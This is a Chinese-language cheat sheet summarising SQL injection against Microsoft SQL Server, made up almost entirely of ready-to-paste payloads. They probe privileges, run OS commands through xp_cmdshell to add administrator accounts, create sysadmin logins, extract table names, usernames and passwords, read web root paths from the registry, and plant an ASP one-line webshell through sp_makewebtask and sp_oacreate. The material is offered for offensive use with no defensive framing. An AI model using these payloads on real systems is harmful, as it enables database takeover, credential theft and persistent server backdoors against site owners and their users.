MS SQL 注入总结
1.
and 1=1
and 1=2
2. and user>0
and db_name()>0
and @@version>0
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 'sa'=(select system_user)
and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regread')
and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='sp_makewebtask')
3. xp_cmdshell?
;EXEC master..xp_cmdshell "net user lee 123456 /add"--
;EXEC master..xp_cmdshell "net localgroup administrators lee /add"--
;Backup database db_name to disk='c:\inetpub\wwwroot\save.db'--
4. ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','@dllname'-- //没有xplog70.dll也可以
;EXEC master.dbo.sp_addlogin test,test--
;EXEC master.dbo.sp_addsrvrolemember test,sysadmin--
;EXEC master.dbo.sp_password test,123456,test--
;EXEC master.dbo.xp_cmdshell 'net user IWAM-IUSR /add'--
5. and (Select top 1 name from (select top N id,name from sysobjects where xtype=‘u’ order by id) T order by id desc)>0 //表名
and 1<(select top 1 col_name(object_id(‘表名’),N) from sysobjects) //列名
and (select top 1 name from (select top N id,username from 表名 order by id) T order by id desc)>0 //用户
and (select password from 表名 where username=‘XX’)>0 //密码
6. ;create table jm_tmp(value nvarchar(4000) null,data nvarchar(4000) null)--
;insert jm_tmp exec master.dbo.xp_regread
'HKEY_LOCAL_MACHINE','SYSTEM\controlset001\services\w3svc\parameters\virtual roots','/'-- (2000 server)
;and 1=(select top 1 cast[data] as nvarchar(4000) + char(124) from [jm_tmp] order by [data] desc)
;drop table jm_tmp--
;create table [dbo].[lee] ([test][char](255));--
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into lee (test) values( @result );--
and 1=(select count(*) from lee where test >1)
;drop table lee--
7. 写一个简单木马到服务器:先创建一个表,再把木马文件添加到表里,使用sp_makewebtask把表导成一个ASP木马文件:EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp', @query = 'SELECT 你的字段 FROM 你建的临时表',如
;create table lee(test nvarchar(4000))--
;insert into lee(test) values ('<%eval request("a")%>') --//一句话木马
;EXECUTE sp_makewebtask @outputfile ='E:\Project\攻防\SQL注入\漏洞程序\dvbbs6.0.0\test.asp', @query = 'SELECT test FROM lee' --
;drop table lee--
直接写一个简易木马到WEB绝对路径(可以由xp_regread来获取)下:
;declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject',
@o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\test.asp',
1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<%dim objFSO%>'--
——在WEB绝对路径下创建一个test.asp文件,并写入一句<%dim objFSO%>
;declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject',
@o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:\inetpub\wwwroot\test.asp',
8 exec @ret = sp_oamethod @f, 'writeline', NULL, '<%dim fdata%> '—
写的时候要把%换成%25
——用同样的方法把木马程序所有的语句写到test.asp文件中。再利用test.asp上传一个功能强大的木马文件,比如海阳2006